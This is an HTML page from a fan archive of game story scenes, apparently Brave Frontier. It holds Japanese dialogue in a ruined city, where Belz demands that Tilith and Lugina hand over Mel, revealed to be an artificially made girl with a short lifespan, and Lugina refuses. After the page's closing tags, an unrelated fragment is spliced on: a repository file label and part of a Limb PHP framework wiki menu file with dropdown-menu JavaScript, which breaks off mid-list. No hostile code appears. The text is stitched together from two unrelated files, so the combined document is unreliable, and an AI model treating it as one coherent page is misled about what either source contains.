<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" />
</div>
<div class="speakerName"><a href="http://i.imgur.com/0ETuoqY.png">ティリス</a></div>
<div class="speakerMessage">ここは……廃墟……? 元は結構大きな街だったみたいだけど……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">ギャレットが向かっていたのは この先でいいのかな?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName"><a href="http://i.imgur.com/YTUavY0.png">ルジーナ</a></div>
<div class="speakerMessage">ああ……。 この先に……間違いねえよ。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName"><a href="http://i.imgur.com/pstdRvJ.png">メル</a></div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_7.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">なら、急ごう! 今ならまだ追いつけるかも。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/blank.png" />
</div>
<div class="speakerName">???</div>
<div class="speakerMessage">その前に、連れている者をこちらに 引き渡してくれるとありがたいのですがね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">ベルツ……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName"><a href="http://i.imgur.com/L9KARyy.png">ベルツ</a></div>
<div class="speakerMessage">メルをそちらに確保されてしまったのは、 想定外でした。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">あなた方がどういう目的で この地にいるのか知りませんが</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">召喚院にとって彼女など無用な存在のはず。 どうか、こちらに渡してくれませんかね?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_7.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">そんなの、できないよ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_7.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">あなたに渡したら、 連邦に連れて行っちゃうんでしょ!?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">もう知ってると思いますが彼女はギャレットとともに魔神復活を企んでいたのですよ。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">そんな人間を、あなたたちが 保護しなければならない理由はないでしょう</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName">メル</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_7.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">で、でも、だからって、 彼女を見捨てることなんかできない!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">ふぅ……そもそも、あなたたちは彼女が どういった存在であるのかご存じですか?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">えっ、“どういった存在”って……?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">召喚術や戦いの訓練はしているかも しれないけど、普通の女の子でしょ?</div>
</div>
<br>
<div class="dialogueSeparator" >
<img src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/dialogueSeparator.png" align="middle" />
</div>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">……………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">女神の力をもってしても、人間とそれに 近しい存在の差異は見抜けないようですね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">彼女は特殊な技術によって、ラナスに…… アベル機関によって造られた存在なんですよ</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">造られた!? それって……?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">メル……あなたからも 答えてあげたらどうですか?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName">メル</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName">メル</div>
<div class="speakerMessage">彼の……言う通り……。私は…… ラナス様とギャレットによって造られた……</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">そんな……人が人を造り出すなんて……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">彼女を造った技術は、 モルデリム支配下のラクシュルトより</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">ラナスたちが持ち帰ったもののようです。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">かの地は、イシュグリアの中でも機械技術と 生物培養技術の発展が著しかったですからね</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">もっとも、 それでも人として活動できる個体……</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">つまり彼女を誕生させるまでには幾度となく 失敗を繰り返すことになったらしいですが。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">メル……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">彼女は生まれてまだ数年と いったところでしょうか。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">ここまで急速に体が成長していることを 考えると……</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">余命はそれほど長くはないでしょうね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName">メル</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">そんな……じゃあ私たちが救っても、 メルは……!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">もう俺の言いたいことはわかりますよね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">寿命もあと幾ばくもなく、未来がない上、</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">信じていた者…… ラナスすらも失った空っぽな存在、</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">それがメルです。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">そんな人間を守る意味などありません。 もちろん我々が争う必要も。</div>
</div>
<br>
<div class="dialogueSeparator" >
<img src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/dialogueSeparator.png" align="middle" />
</div>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">さあ、わかったら 彼女を俺に渡してください。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">で……でも……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">ハッ! さっきから黙って聞いてりゃ おかしなことぬかしやがるぜ。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">言ってるテメーは、この女とどう違う?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">俺の目の前から消えて、連邦上層部の 言いなりになってるテメーはよ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">……俺が彼女と同じとでもいうつもりかい? まったく笑えない冗談だね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">いいや、同じさ。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">今のテメーはギャレットたちを捕らえ、 その計画を阻止するって目的があるだろうよ</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">だが、それが終わった後は、 一体どうするつもりだ?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_5.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">連邦高官たちに言われるまま、 アベル機関に代わる秘密機関の長官になり、</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_5.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">一生操り人形でもやるつもりか?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_6.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">……秘密機関の長官、か…… よく知っているな。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">あんまり俺を舐めるなよ。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">なら、俺がどういう状況なのかも 知っているだろ……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">召喚の真の力を求め、それが叶わなかったら 今度は生き残ることに精一杯ってか?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">ケッ、それこそ笑えねー冗談だぜ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_6.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_6.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">……どうやら、穏便に引き渡してくれる気は ないようだね。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">ああ、今のテメーには渡せねーな。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">……わかった。ここは引こう。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">俺にとっても、お前たちと 争っている場合じゃない。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" />
</div>
<div class="speakerName">ベルツ</div>
<div class="speakerMessage">今はもう1人……ギャレットを 阻止することが先決だからな。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">ベルツ…… どうしてそこまで……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_3.png" />
</div>
<div class="speakerName">メル</div>
<div class="speakerMessage">…………。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" />
</div>
<div class="speakerName">ルジーナ</div>
<div class="speakerMessage">……この先に行けばわかる。 とにかく進むぞ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" />
</div>
<div class="speakerName">ティリス</div>
<div class="speakerMessage">う、うん……!</div>
</div>
<br>
</body>
</html>
<!-- contact me at reddit /u/blackrobe199 -->
|
menu/menu_en.html | limb-php-framework/limb-wiki | <link rel="stylesheet" media="screen" type="text/css" href="/menu/styles/menu.css" />
<!--<script type="text/javascript" src="/menu/scripts/jquery.js"></script>
<script type="text/javascript" src="/menu/scripts/snow.js"></script>-->
<script type="text/javascript" src="/menu/scripts/dropdownmenu2.js"></script>
<script type="text/javascript">
var menu = new LimbMenu();
menu.addMenu('menu1');
menu.addMenu('menu2');
menu.addMenu('menu3');
menu.addMenu('menu4');
menu.addMenu('menu5');
menu.addMenu('menu6');
</script>
<div id="menu" onmouseover="menu.keepMenuVisible();" onmouseout="menu.delayHideMenus();">
<div id="top_menu">
<div id="page-width">
<ul id="mainmenulist" class="float-break">
<li><a href="http://limb-project.com/en" onmouseover="menu.showMenu('menu1');">limb-project.com</a>
<!--<li><a href="http://limb-project.com/en" onmouseover="menu.showMenu('menu1');">limb-project.com</a>
<div style="display: none;" class="dropdownmenu" id="menu1">
<ul>
<li><div><a href="http://limb-project.com/en/news">News</a></div></li>
<li><div><a href="http://wiki.limb-project.com/en/roadmap">Roadmap</a></div></li>
<li><div><a href="http://limb-project.com/en/limb3">Limb3</a></div></li>
<li><div><a href="http://limb-project.com/en/limb2">Limb2</a></div></li>
<li><div><a href="http://old.limb-project.com">Old site</a></div></li>
</ul>
</div>
</li>
<li class="current"><a href="http://limb-project.com/en/community" onmouseover="menu.showMenu('menu2');">Community</a>
<div style="display: none;" class="dropdownmenu" id="menu2">
<ul>
<li><div><a href="http://forum.limb-project.com">Forum</a></div></li>
